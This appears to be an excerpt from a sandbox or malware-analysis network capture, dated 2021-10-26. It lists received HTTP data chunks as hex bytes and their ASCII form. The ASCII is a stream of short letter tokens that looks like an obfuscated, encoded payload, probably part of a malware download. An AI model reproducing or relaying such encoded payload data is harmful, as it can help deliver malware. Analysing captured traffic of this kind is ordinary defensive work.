                                                                                                2021-10-26 15:35:14 UTC5156INData Raw: 50 20 54 53 4f 20 4f 69 20 4d 4d 70 20 69 70 20 4d 70 20 4d 53 54 20 55 69 20 54 54 69 20 54 54 50 20 6e 6e 20 69 55 20 69 50 20 69 55 20 50 53 20 54 55 70 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 55 20 55 55 20 4f 6e 20 69 4f 20 50 53 20 69 55 20 69 50 20 70 4d 20 54 54 6e 20 54 53 4f 20 54 54 67 20 70 6e 20 54 4d 69 20 50 53 20 50 69 20 55 50 20 55 55 20 54 53 4d 20 4f 67 20 54 54 69 20 50 53 20 4d 53 20 50 53 20 50 69 20 55 69 20 54 4d 70 20 54 54 6e 20 54 53 4f 20 4f 6e 20 54 55 20 67 20 4d 55 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 54 70 20 4d 53 50 20 4d 53 54 20 55 69 20 54 54 69 20 4d 69 4f 20 67 67 20 54 54 4d 20 50 53 20 69 4f 20 4d 70 20 54 53 54 20 55 50 20 54 54 69 20 54 54 50 20 4d 53 20 70 53 20 50 53
                                                                                                Data Ascii: P TSO Oi MMp ip Mp MST Ui TTi TTP nn iU iP iU PS TUp Mi TTi TTn TSU UU On iO PS iU iP pM TTn TSO TTg pn TMi PS Pi UP UU TSM Og TTi PS MS PS Pi Ui TMp TTn TSO On TU g MU MgS ni OS TgU TSO TTM PM Tp MSP MST Ui TTi MiO gg TTM PS iO Mp TST UP TTi TTP MS pS PS
                                                                                                2021-10-26 15:35:14 UTC5161INData Raw: 20 50 70 20 54 70 20 55 67 20 4d 4f 20 54 55 67 20 54 53 55 20 54 54 4d 20 50 70 20 4d 4d 20 50 67 20 50 4d 20 50 4f 20 54 6e 6e 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 4f 67 20 4d 69 69 20 50 54 20 50 69 20 4f 69 20 4d 4f 20 54 55 53 20 54 53 55 20 54 54 4d 20 50 70 20 4d 4d 20 50 67 20 50 4d 20 50 4f 20 4f 67 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 4f 67 20 4d 69 54 20 50 54 20 50 69 20 4f 69 20 55 69 20 54 54 4f 20 4d 20 70 54 20 50 53 20 69 55 20 50 70 20 4d 70 20 6e 69 20 55 4f 20 54 54 55 20 54 53 4d 20 4f 54 20 4d 69 4d 20 50 50 20 4f 67 20 4d 69 69 20 55 50 20 54 54 69 20 54 4d 6e 20 6e 50 20 54 54 4f 20 69 55 20 4f 50 20 54 4d 6e 20 50 69 20 55 69 20 54 4d 53 20 4f 67 20 69 4f 20 54 54 67 20 50 53 20 50 69 20 4f 67 20 4d 69 6e 20 55 50 20 54 54 69
                                                                                                Data Ascii: Pp Tp Ug MO TUg TSU TTM Pp MM Pg PM PO Tnn TTp TSO TMM Og Mii PT Pi Oi MO TUS TSU TTM Pp MM Pg PM PO Og TTp TSO TMM Og MiT PT Pi Oi Ui TTO M pT PS iU Pp Mp ni UO TTU TSM OT MiM PP Og Mii UP TTi TMn nP TTO iU OP TMn Pi Ui TMS Og iO TTg PS Pi Og Min UP TTi
                                                                                                2021-10-26 15:35:14 UTC5165INData Raw: 70 69 20 54 54 50 20 4d 53 20 4d 4d 20 4d 69 20 6e 50 20 54 4f 67 20 54 54 69 20 54 54 6e 20 54 53 50 20 4f 54 20 4d 53 4d 20 69 55 20 69 4f 20 70 20 4f 67 20 54 54 69 20 54 53 70 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 4d 20 54 54 4f 20 4d 4d 20 4d 67 53 20 50 53 20 69 55 20 50 69 20 50 67 20 54 4d 69 20 4d 69 6e 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 6e 53 20 54 4d 20 50 53 20 50 69 20 55 70 20 54 54 53 20 55 55 20 54 54 53 20 55 70 20 4d 53 20 4d 70 20 6e 4f 20 54 70 53 20 55 69 20 54 54 69 20 54 54 67 20 6e 53 20 54 67 70 20 50 53 20 50 54 20 4d 20 70 67 20 55 69 20 54 53 4f 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 70 20 54 54 4d 20 54 69 20 4d 50 54 20 54 54 4d 20 50 53 20 50
                                                                                                Data Ascii: pi TTP MS MM Mi nP TOg TTi TTn TSP OT MSM iU iO p Og TTi TSp TSO TTM PS iU PS Pi Ui TTM TTO MM MgS PS iU Pi Pg TMi Min TTn TSO TMM nS TM PS Pi Up TTS UU TTS Up MS Mp nO TpS Ui TTi TTg nS Tgp PS PT M pg Ui TSO TTn TSO TTM PS iU PS Pi Up TTM Ti MPT TTM PS P
                                                                                                2021-10-26 15:35:14 UTC5168INData Raw: 50 53 20 50 55 20 55 69 20 54 54 69 20 54 53 53 20 54 54 54 20 54 53 4f 20 69 54 20 4d 4f 20 50 67 20 54 70 20 69 6e 20 4d 54 54 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4d 69 20 4d 4d 20 4d 50 20 54 4f 67 20 55 69 20 54 54 67 20 70 4f 20 54 53 53 20 54 54 4d 20 70 54 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20 69 4f 20 67 55 20 67 53 20 50 67 20 54 54 69 20 55 69 20 4f 50 20 54 70 20 4d 53 4f 20 50 53 20 69 55 20 50 69 20 4d 4f 20 54 6e 4d 20 54 54 69 20 54 53 4d 20 4f 67 20 54 54 50 20 50 53 20 70 67 20 50 53 20 50 69 20 55 69 20 54 4d 70 20 54 54 6e 20 54 53 4f 20 4f 6e 20 69 55 20 67 4f 20 67 70 20 4d 70 20 55 67 20 55 69 20 54 69 20 4d 53 6e 20 54 54 4d 20 50 53 20 50 4d 20 4d 69 20 54 70 20 54 4d 6e 20 54 67
                                                                                                Data Ascii: PS PU Ui TTi TSS TTT TSO iT MO Pg Tp in MTT TTn TSO TTp Mi MM MP TOg Ui TTg pO TSS TTM pT iU PS Pi Ui TTi TTn TSO TTi iO gU gS Pg TTi Ui OP Tp MSO PS iU Pi MO TnM TTi TSM Og TTP PS pg PS Pi Ui TMp TTn TSO On iU gO gp Mp Ug Ui Ti MSn TTM PS PM Mi Tp TMn Tg
                                                                                                2021-10-26 15:35:14 UTC5172INData Raw: 20 50 69 20 55 69 20 54 54 69 20 54 54 4d 20 54 54 70 20 4f 67 20 50 55 20 4d 4d 20 67 70 20 67 4d 20 54 4d 53 20 54 54 70 20 55 67 20 6e 53 20 6e 4f 20 70 67 20 4d 6e 20 54 4f 70 20 50 55 20 54 4d 6e 20 54 67 55 20 54 4d 69 20 54 53 54 20 4d 67 69 20 69 70 20 4d 4f 20 70 4d 20 54 70 20 55 4d 20 4d 4f 20 70 69 20 54 53 4f 20 54 54 4d 20 50 70 20 69 53 20 54 20 54 4f 20 54 4d 6e 20 54 54 67 20 54 4d 6e 20 6e 53 20 54 67 53 20 69 55 20 6e 50 20 54 70 70 20 50 69 20 55 69 20 54 54 55 20 54 53 4d 20 54 53 50 20 4f 6e 20 50 69 20 4d 55 20 50 70 20 67 4f 20 55 53 20 54 54 4d 20 54 54 55 20 54 53 6e 20 67 54 20 4d 69 4d 20 69 4f 20 50 53 20 69 55 20 55 70 20 54 54 70 20 54 54 67 20 4d 20 4d 67 69 20 50 54 20 69 55 20 50 4d 20 4d 67 4d 20 4d 67 20 54 4d 4d 20 4f
                                                                                                Data Ascii: Pi Ui TTi TTM TTp Og PU MM gp gM TMS TTp Ug nS nO pg Mn TOp PU TMn TgU TMi TST Mgi ip MO pM Tp UM MO pi TSO TTM Pp iS T TO TMn TTg TMn nS TgS iU nP Tpp Pi Ui TTU TSM TSP On Pi MU Pp gO US TTM TTU TSn gT MiM iO PS iU Up TTp TTg M Mgi PT iU PM MgM Mg TMM O
                                                                                                2021-10-26 15:35:14 UTC5176INData Raw: 54 6e 20 54 53 6e 20 54 6e 69 20 50 55 20 67 67 20 50 4d 20 67 53 20 4d 4d 4d 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 6e 4d 20 4d 67 70 20 4f 70 20 69 55 20 6e 6e 20 4d 53 6e 20 54 54 69 20 54 54 6e 20 54 53 50 20 4f 4f 20 50 67 20 67 67 20 50 67 20 4d 70 20 6e 54 20 4f 4f 20 54 54 69 20 54 54 54 20 54 54 70 20 4f 67 20 4d 53 4f 20 50 54 20 50 69 20 4f 69 20 54 20 54 50 6e 20 54 53 55 20 54 54 4d 20 50 70 20 4f 50 20 4d 50 69 20 50 50 20 55 69 20 54 54 70 20 54 54 4f 20 4d 20 4d 54 54 20 50 54 20 69 55 20 50 4d 20 4d 67 4d 20 54 4d 50 20 55 6e 20 4f 67 20 67 67 20 54 54 4d 20 50 53 20 50 55 20 50 6e 20 50 4d 20 69 6e 20 4d 67 67 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 67 20 50 50 20 67 50 20 69 4f 20 54 4d 53 20 54 4d 67 20 54 53 53 20 54 53 70 20 54
                                                                                                Data Ascii: Tn TSn Tni PU gg PM gS MMM TTi TTn TSg TnM Mgp Op iU nn MSn TTi TTn TSP OO Pg gg Pg Mp nT OO TTi TTT TTp Og MSO PT Pi Oi T TPn TSU TTM Pp OP MPi PP Ui TTp TTO M MTT PT iU PM MgM TMP Un Og gg TTM PS PU Pn PM in Mgg TTn TSO TTp gg PP gP iO TMS TMg TSS TSp T
                                                                                                2021-10-26 15:35:14 UTC5180INData Raw: 4d 20 54 69 20 54 4f 50 20 54 54 4d 20 50 53 20 50 4d 20 67 53 20 67 70 20 55 70 20 4f 20 4d 54 4f 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 4d 67 70 20 50 50 20 55 69 20 54 4d 53 20 54 54 4f 20 54 4d 54 20 54 67 20 54 50 70 20 69 55 20 50 53 20 50 53 20 55 70 20 4f 20 4d 54 55 20 54 53 4f 20 54 54 4d 20 50 69 20 4d 55 20 67 4d 20 50 4d 20 69 6e 20 4d 4d 54 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4f 67 20 4d 67 55 20 50 54 20 50 69 20 4f 69 20 54 54 4d 20 4f 6e 20 54 70 20 4d 4d 67 20 50 53 20 69 55 20 50 69 20 50 4d 20 69 6e 20 54 4f 69 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 53 20 67 69 20 69 55 20 6e 6e 20 4d 4d 55 20 54 54 69 20 54 54 6e 20 54 53 50 20 67 54 20 4d 67 70 20 69 4f 20 50 53 20 70 53 20 55 70 20 54 53 4d 20 55 20 4d 4d 54 20 54 54 4d
                                                                                                Data Ascii: M Ti TOP TTM PS PM gS gp Up O MTO TSO TTM Pi OP Mgp PP Ui TMS TTO TMT Tg TPp iU PS PS Up O MTU TSO TTM Pi MU gM PM in MMT TTn TSO TTp Og MgU PT Pi Oi TTM On Tp MMg PS iU Pi PM in TOi TTn TSO TTp gS gi iU nn MMU TTi TTn TSP gT Mgp iO PS pS Up TSM U MMT TTM
                                                                                                2021-10-26 15:35:14 UTC5184INData Raw: 20 54 53 4d 20 4d 53 4f 20 50 67 20 4d 54 54 20 4d 54 69 20 4d 67 4d 20 54 53 55 20 54 4f 53 20 4d 50 69 20 54 6e 55 20 4d 53 53 20 70 6e 20 67 4d 20 4d 53 6e 20 54 69 50 20 4d 53 55 20 50 4f 20 54 55 67 20 4d 54 53 20 54 50 55 20 54 4d 6e 20 4d 53 6e 20 69 54 20 54 67 70 20 54 54 6e 20 54 70 20 4f 70 20 50 69 20 4d 53 70 20 4d 54 67 20 54 70 50 20 54 50 54 20 4d 4d 55 20 54 4d 53 20 54 50 53 20 4d 53 53 20 54 67 69 20 4d 53 55 20 67 20 4d 53 6e 20 54 6e 70 20 4d 4d 55 20 67 69 20 50 4d 20 54 4d 67 20 4d 67 50 20 4d 53 4f 20 4d 54 20 54 70 53 20 54 70 54 20 4d 53 67 20 54 54 67 20 4d 67 6e 20 54 55 50 20 54 67 53 20 4d 67 20 54 4d 54 20 54 54 55 20 54 67 53 20 67 55 20 54 4d 50 20 54 69 54 20 54 69 4f 20 6e 6e 20 54 4d 20 54 69 4d 20 4d 67 4d 20 4d 6e 20
                                                                                                Data Ascii: TSM MSO Pg MTT MTi MgM TSU TOS MPi TnU MSS pn gM MSn TiP MSU PO TUg MTS TPU TMn MSn iT Tgp TTn Tp Op Pi MSp MTg TpP TPT MMU TMS TPS MSS Tgi MSU g MSn Tnp MMU gi PM TMg MgP MSO MT TpS TpT MSg TTg Mgn TUP TgS Mg TMT TTU TgS gU TMP TiT TiO nn TM TiM MgM Mn
                                                                                                2021-10-26 15:35:14 UTC5188INData Raw: 20 50 4f 20 4d 53 55 20 54 67 6e 20 54 69 4f 20 54 4d 53 20 54 69 54 20 54 69 4f 20 54 50 4d 20 55 4f 20 4d 53 69 20 6e 69 20 54 54 6e 20 6e 53 20 54 53 67 20 54 55 53 20 54 4d 55 20 67 53 20 54 6e 50 20 4d 54 53 20 54 69 4d 20 67 54 20 67 55 20 55 4d 20 54 55 69 20 4d 69 54 20 50 69 20 4d 69 67 20 55 67 20 54 4f 6e 20 4d 4d 69 20 54 4d 4d 20 54 69 67 20 54 69 50 20 4d 54 53 20 4d 4d 54 20 4d 69 4f 20 54 55 69 20 4d 67 55 20 6e 55 20 4d 69 53 20 55 70 20 4d 54 55 20 69 55 20 69 50 20 4d 69 70 20 54 55 54 20 4d 67 70 20 6e 6e 20 67 4f 20 54 53 4d 20 4d 53 54 20 54 4d 70 20 4d 67 50 20 4d 53 4f 20 4d 67 53 20 54 6e 53 20 67 53 20 4d 4d 53 20 50 70 20 70 69 20 4d 69 67 20 70 4d 20 54 67 69 20 55 50 20 54 54 50 20 54 50 53 20 54 67 54 20 4f 54 20 54 54 69 20
                                                                                                Data Ascii: PO MSU Tgn TiO TMS TiT TiO TPM UO MSi ni TTn nS TSg TUS TMU gS TnP MTS TiM gT gU UM TUi MiT Pi Mig Ug TOn MMi TMM Tig TiP MTS MMT MiO TUi MgU nU MiS Up MTU iU iP Mip TUT Mgp nn gO TSM MST TMp MgP MSO MgS TnS gS MMS Pp pi Mig pM Tgi UP TTP TPS TgT OT TTi
                                                                                                2021-10-26 15:35:14 UTC5193INData Raw: 69 20 4d 67 50 20 4d 53 4f 20 4d 69 54 20 4f 55 20 54 4d 67 20 54 55 53 20 4d 4d 4f 20 54 6e 70 20 54 55 67 20 54 4f 54 20 4d 4d 69 20 70 54 20 54 4d 69 20 50 4d 20 54 69 54 20 54 69 6e 20 4f 20 4d 50 53 20 54 50 70 20 4f 6e 20 54 53 6e 20 4d 4d 53 20 54 4d 70 20 4d 50 20 4d 4d 4d 20 70 4d 20 55 50 20 54 70 20 4d 53 50 20 4d 54 69 20 55 50 20 4d 67 6e 20 4d 4d 20 4d 50 69 20 54 55 69 20 54 4d 6e 20 6e 55 20 54 53 67 20 50 70 20 54 4f 55 20 54 69 20 54 54 55 20 54 69 67 20 54 69 50 20 54 4d 69 20 54 67 20 4f 70 20 69 6e 20 4d 53 55 20 67 67 20 54 54 50 20 54 4d 54 20 54 54 55 20 54 67 6e 20 4d 69 6e 20 6e 53 20 54 67 54 20 55 54 20 54 4d 4d 20 54 20 4d 55 20 55 53 20 54 54 69 20 54 70 20 4d 53 50 20 4d 54 69 20 4d 70 20 50 4f 20 54 69 6e 20 4f 70 20 54 50
                                                                                                Data Ascii: i MgP MSO MiT OU TMg TUS MMO Tnp TUg TOT MMi pT TMi PM TiT Tin O MPS TPp On TSn MMS TMp MP MMM pM UP Tp MSP MTi UP Mgn MM MPi TUi TMn nU TSg Pp TOU Ti TTU Tig TiP TMi Tg Op in MSU gg TTP TMT TTU Tgn Min nS TgT UT TMM T MU US TTi Tp MSP MTi Mp PO Tin Op TP
                                                                                                2021-10-26 15:35:14 UTC5197INData Raw: 4f 54 20 4d 67 53 20 4d 54 53 20 4d 4d 67 20 4d 69 53 20 55 6e 20 50 50 20 67 4f 20 54 50 69 20 55 53 20 50 55 20 4d 67 4d 20 4d 4d 4d 20 6e 69 20 54 50 69 20 69 70 20 4d 53 6e 20 54 69 50 20 4f 4d 20 54 4f 53 20 53 20 4d 69 55 20 54 50 67 20 4d 67 69 20 4d 50 69 20 54 67 53 20 55 69 20 4f 4f 20 69 4f 20 4d 53 69 20 4d 67 20 4d 53 50 20 4d 54 69 20 4f 67 20 54 4d 53 20 4f 70 20 4d 53 54 20 4d 67 50 20 67 50 20 4d 54 4d 20 54 55 4d 20 55 69 20 69 4f 20 55 50 20 50 6e 20 54 4f 53 20 55 54 20 50 6e 20 54 50 67 20 69 4f 20 4d 53 4d 20 4d 53 70 20 54 6e 6e 20 4d 4d 4d 20 4d 67 67 20 54 6e 50 20 54 54 53 20 54 55 67 20 54 50 54 20 54 70 4d 20 6e 6e 20 4d 69 53 20 70 53 20 54 54 53 20 54 53 6e 20 4f 67 20 54 4f 20 55 54 20 50 69 20 4d 54 53 20 4d 54 54 20 54 50
                                                                                                Data Ascii: OT MgS MTS MMg MiS Un PP gO TPi US PU MgM MMM ni TPi ip MSn TiP OM TOS S MiU TPg Mgi MPi TgS Ui OO iO MSi Mg MSP MTi Og TMS Op MST MgP gP MTM TUM Ui iO UP Pn TOS UT Pn TPg iO MSM MSp Tnn MMM Mgg TnP TTS TUg TPT TpM nn MiS pS TTS TSn Og TO UT Pi MTS MTT TP
                                                                                                2021-10-26 15:35:14 UTC5200INData Raw: 55 50 20 54 53 4f 20 54 54 4d 20 50 53 20 54 4f 20 54 53 67 20 54 53 54 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 69 55 20 69 55 20 50 53 20 50 50 20 67 20 4d 53 50 20 4d 54 50 20 54 54 69 20 54 4d 54 20 69 50 20 69 55 20 50 53 20 50 69 20 54 6e 69 20 54 54 50 20 6e 53 20 54 53 4f 20 54 54 69 20 50 53 20 69 55 20 50 54 20 50 69 20 55 69 20 54 54 69 20 54 70 50 20 54 53 4f 20 54 54 4d 20 50 53 20 54 54 4f 20 50 53 20 50 69 20 55 69 20 54 70 50 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 4d 4d 70 20 69 4f 20 50 53 20 50 69 20 54 50 4d 20 54 54 50 20 54 54 6e 20 54 53 4f 20 54 54 4f 20 50 53 20 69 55 20 50 53 20 4d 53 53 20 55 50 20 54 54 69 20 54 54 6e 20 54 4d 67 20 54 54 4d 20 50 53 20 69 55 20 54 53 69 20 50 69 20 55 69 20 54 54 69 20 54 54
                                                                                                Data Ascii: UP TSO TTM PS TO TSg TST Ui TTi TTn TSO TTM iU iU PS PP g MSP MTP TTi TMT iP iU PS Pi Tni TTP nS TSO TTi PS iU PT Pi Ui TTi TpP TSO TTM PS TTO PS Pi Ui TpP TTn TSO TTM MMp iO PS Pi TPM TTP TTn TSO TTO PS iU PS MSS UP TTi TTn TMg TTM PS iU TSi Pi Ui TTi TT
                                                                                                2021-10-26 15:35:14 UTC5204INData Raw: 20 55 6e 20 70 67 20 4d 54 70 20 70 4d 20 69 55 20 55 69 20 69 4f 20 54 4d 53 20 54 67 67 20 54 4d 69 20 50 4d 20 69 55 20 54 4d 69 20 50 4f 20 54 55 55 20 54 4d 70 20 54 54 50 20 54 53 4f 20 67 70 20 70 67 20 4d 54 70 20 70 4d 20 69 55 20 55 69 20 54 70 20 54 4d 53 20 54 67 67 20 54 4d 69 20 50 4d 20 69 55 20 4f 67 20 50 4f 20 54 67 20 54 54 69 20 54 54 50 20 54 53 4f 20 4d 69 50 20 70 67 20 54 53 50 20 50 53 20 69 55 20 55 69 20 4d 50 4d 20 54 4d 53 20 50 4d 20 54 54 4d 20 50 4d 20 69 55 20 54 70 54 20 50 4f 20 54 67 20 54 54 69 20 54 54 50 20 54 53 4f 20 4d 67 69 20 70 67 20 54 53 50 20 50 53 20 69 55 20 55 69 20 4d 54 54 20 54 4d 53 20 50 4d 20 54 54 4d 20 50 4d 20 69 55 20 54 50 69 20 50 4f 20 54 67 20 54 54 69 20 54 54 50 20 54 53 4f 20 54 4f 4d 20
                                                                                                Data Ascii: Un pg MTp pM iU Ui iO TMS Tgg TMi PM iU TMi PO TUU TMp TTP TSO gp pg MTp pM iU Ui Tp TMS Tgg TMi PM iU Og PO Tg TTi TTP TSO MiP pg TSP PS iU Ui MPM TMS PM TTM PM iU TpT PO Tg TTi TTP TSO Mgi pg TSP PS iU Ui MTT TMS PM TTM PM iU TPi PO Tg TTi TTP TSO TOM
                                                                                                2021-10-26 15:35:14 UTC5208INData Raw: 67 20 69 50 20 54 50 4d 20 50 69 20 70 70 20 54 54 69 20 54 67 4d 20 54 54 4d 20 4d 54 55 20 50 53 20 50 69 20 50 53 20 69 6e 20 54 54 70 20 4d 53 50 20 54 54 6e 20 54 53 6e 20 54 54 4d 20 6e 20 54 70 20 4d 69 70 20 50 69 20 55 4d 20 54 54 69 20 67 70 20 6e 6e 20 54 55 67 20 50 53 20 50 69 20 50 53 20 54 54 54 20 54 54 6e 20 54 55 54 20 54 54 6e 20 54 53 6e 20 54 54 4d 20 4d 53 4f 20 54 55 20 50 70 20 50 50 20 55 4d 20 54 54 69 20 54 67 55 20 6e 4f 20 54 55 53 20 50 53 20 50 69 20 50 53 20 69 50 20 54 54 4f 20 4d 53 50 20 54 54 6e 20 54 53 6e 20 54 54 4d 20 50 20 54 4f 20 54 50 4d 20 50 69 20 55 4d 20 54 54 69 20 67 55 20 6e 55 20 54 4d 6e 20 50 54 20 50 69 20 50 53 20 55 4f 20 54 54 4f 20 54 4d 50 20 54 54 70 20 54 53 6e 20 54 54 4d 20 54 55 50 20 54 4f
                                                                                                Data Ascii: g iP TPM Pi pp TTi TgM TTM MTU PS Pi PS in TTp MSP TTn TSn TTM n Tp Mip Pi UM TTi gp nn TUg PS Pi PS TTT TTn TUT TTn TSn TTM MSO TU Pp PP UM TTi TgU nO TUS PS Pi PS iP TTO MSP TTn TSn TTM P TO TPM Pi UM TTi gU nU TMn PT Pi PS UO TTO TMP TTp TSn TTM TUP TO
                                                                                                2021-10-26 15:35:14 UTC5212INData Raw: 6e 20 69 4f 20 50 50 20 54 53 4d 20 54 6e 55 20 4d 20 4d 69 67 20 50 69 20 54 54 69 20 50 4f 20 4d 69 53 20 54 54 69 20 54 50 54 20 54 54 55 20 69 4f 20 4d 20 4d 69 4d 20 70 53 20 4d 53 4d 20 50 4d 20 50 67 20 54 53 4d 20 54 6e 55 20 54 53 67 20 4d 69 67 20 50 69 20 54 54 69 20 70 54 20 55 53 20 50 53 20 69 55 20 50 53 20 50 69 20 70 70 20 54 54 69 20 54 69 4f 20 54 54 6e 20 4f 4f 20 50 53 20 69 4f 20 50 53 20 54 67 69 20 54 54 70 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 67 50 20 69 53 20 50 55 20 69 69 20 54 70 20 54 54 69 20 54 54 4f 20 54 53 4f 20 54 54 70 20 54 4f 20 69 55 20 50 53 20 50 69 20 55 69 20 4f 6e 20 54 54 6e 20 4f 55 20 54 53 70 20 54 4d 4d 20 69 55 20 69 55 20 50 69 20 6e 4d 20 55 67 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53
                                                                                                Data Ascii: n iO PP TSM TnU M Mig Pi TTi PO MiS TTi TPT TTU iO M MiM pS MSM PM Pg TSM TnU TSg Mig Pi TTi pT US PS iU PS Pi pp TTi TiO TTn OO PS iO PS Tgi TTp TTi TTn TSO TTM gP iS PU ii Tp TTi TTO TSO TTp TO iU PS Pi Ui On TTn OU TSp TMM iU iU Pi nM Ug TTn TSO TTM PS
                                                                                                2021-10-26 15:35:14 UTC5216INData Raw: 20 54 53 55 20 70 70 20 4d 53 4d 20 54 53 55 20 70 4d 20 50 53 20 4d 69 55 20 6e 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 20 54 54 50 20 6e 50 20 53 20 4d 69 6e 20 50 50 20 69 20 54 54 69 20 4d 4f 20 4f 54 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 55 53 20 55 6e 20 4d 53 53 20 70 4f 20 54 53 69 20 54 54 67 20 4f 70 20 69 55 20 4d 54 53 20 53 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 4d 4d 20 69 4f 20 4d 54 53 20 4d 20 54 54 20 55 50 20 67 67 20 54 54 6e 20 4f 67 20 6e 54 20 50 53 20 69 55 20 50 53 20 50 69 20 50 53 20 54 54 67 20 54 50 50 20 4f 67 20 54 55 6e 20 50 54 20 54 53 53 20 50 53 20 4d 67 53 20 4f 4f 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 4d 20 69 55 20 4d 53 67 20 70 20 4d 53 53 20 54 54 69 20 67 67 20 54 53 4f 20
                                                                                                Data Ascii: TSU pp MSM TSU pM PS MiU n Pi Ui TTi TTn TT TTP nP S Min PP i TTi MO OT TTM PS iU PS US Un MSS pO TSi TTg Op iU MTS S Ui TTi TTn TSO MM iO MTS M TT UP gg TTn Og nT PS iU PS Pi PS TTg TPP Og TUn PT TSS PS MgS OO TTi TTn TSO TTM PM iU MSg p MSS TTi gg TSO
                                                                                                2021-10-26 15:35:14 UTC5220INData Raw: 69 20 55 69 20 54 54 69 20 54 53 53 20 54 53 4f 20 4f 67 20 54 4d 70 20 70 69 20 69 55 20 54 55 55 20 55 69 20 6e 69 20 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 67 50 20 50 69 20 69 50 20 70 4d 20 50 20 54 54 54 20 4d 50 54 20 50 53 20 54 4d 20 55 70 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 54 4d 20 4d 69 6e 20 54 4d 69 20 4d 54 55 20 50 4d 20 4d 54 70 20 54 54 69 20 54 20 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 67 4d 20 55 69 20 4f 50 20 50 70 20 54 50 6e 20 54 54 69 20 54 55 55 20 69 55 20 4d 54 55 20 55 4d 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 53 4d 20 50 53 20 54 4d 4f 20 54 4d 6e 20 4d 53 69 20 55 70 20 4d 4d 6e 20 54 54 6e 20 50 67 20 4d 54 20 50 53 20 69 55 20 50 53 20 50 69 20 70 70 20 54 54 69 20 54
                                                                                                Data Ascii: i Ui TTi TSS TSO Og TMp pi iU TUU Ui ni Tn TSO TTM PS iU gP Pi iP pM P TTT MPT PS TM Up Pi Ui TTi TTn TMi TTM Min TMi MTU PM MTp TTi T O TTM PS iU PS gM Ui OP Pp TPn TTi TUU iU MTU UM Ui TTi TTn TSO TSM PS TMO TMn MSi Up MMn TTn Pg MT PS iU PS Pi pp TTi T
                                                                                                2021-10-26 15:35:14 UTC5225INData Raw: 4f 4d 20 67 53 20 54 54 55 20 54 54 4d 20 54 53 55 20 54 53 55 20 54 55 4d 20 69 55 20 50 53 20 50 69 20 55 69 20 4d 69 69 20 54 53 4f 20 54 50 55 20 54 53 70 20 55 50 20 69 55 20 50 4d 20 50 50 20 54 70 20 4d 69 70 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 54 55 4d 20 69 4d 20 54 4f 6e 20 6e 55 20 4d 67 69 20 54 54 70 20 54 53 6e 20 54 54 67 20 54 6e 53 20 54 55 53 20 50 53 20 50 69 20 55 69 20 54 54 69 20 4d 69 67 20 54 53 4f 20 54 4d 54 20 55 4f 20 54 6e 4d 20 50 53 20 69 4f 20 55 50 20 54 4f 55 20 4d 69 54 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 54 6e 4f 20 50 69 20 54 53 4f 20 4d 50 20 54 55 20 54 53 4f 20 54 54 4f 20 50 54 20 54 55 53 20 54 55 67 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 4d 67 50 20 54 54 4d 20 4f 54 20 4f 54 20 54 53
                                                                                                Data Ascii: OM gS TTU TTM TSU TSU TUM iU PS Pi Ui Mii TSO TPU TSp UP iU PM PP Tp Mip TTn TSO TTM PS TUM iM TOn nU Mgi TTp TSn TTg TnS TUS PS Pi Ui TTi Mig TSO TMT UO TnM PS iO UP TOU MiT TSO TTM PS iU TnO Pi TSO MP TU TSO TTO PT TUS TUg Pi Ui TTi TTn MgP TTM OT OT TS
                                                                                                2021-10-26 15:35:14 UTC5229INData Raw: 20 55 54 20 54 6e 6e 20 54 54 53 20 55 54 20 6e 4f 20 54 54 70 20 4f 20 4d 54 4f 20 50 53 20 69 55 20 50 53 20 50 69 20 70 70 20 54 54 69 20 4d 67 70 20 4d 67 55 20 69 70 20 50 50 20 54 69 20 50 54 20 54 6e 55 20 4d 50 50 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 67 70 20 69 55 20 54 67 50 20 54 55 54 20 69 4f 20 54 54 4f 20 6e 69 20 54 53 55 20 54 6e 70 20 54 50 67 20 69 55 20 50 53 20 50 69 20 55 69 20 54 53 53 20 54 54 6e 20 54 4d 55 20 4d 69 67 20 4f 69 20 50 67 20 54 54 69 20 50 50 20 50 4d 20 4d 4d 4d 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 50 69 20 69 4d 20 54 4f 6e 20 6e 55 20 54 6e 4d 20 54 54 6e 20 69 70 20 54 54 67 20 54 55 4d 20 54 50 70 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 4f 20 54 54 53 20 54 55 4f 20 54 55 4d 20 55
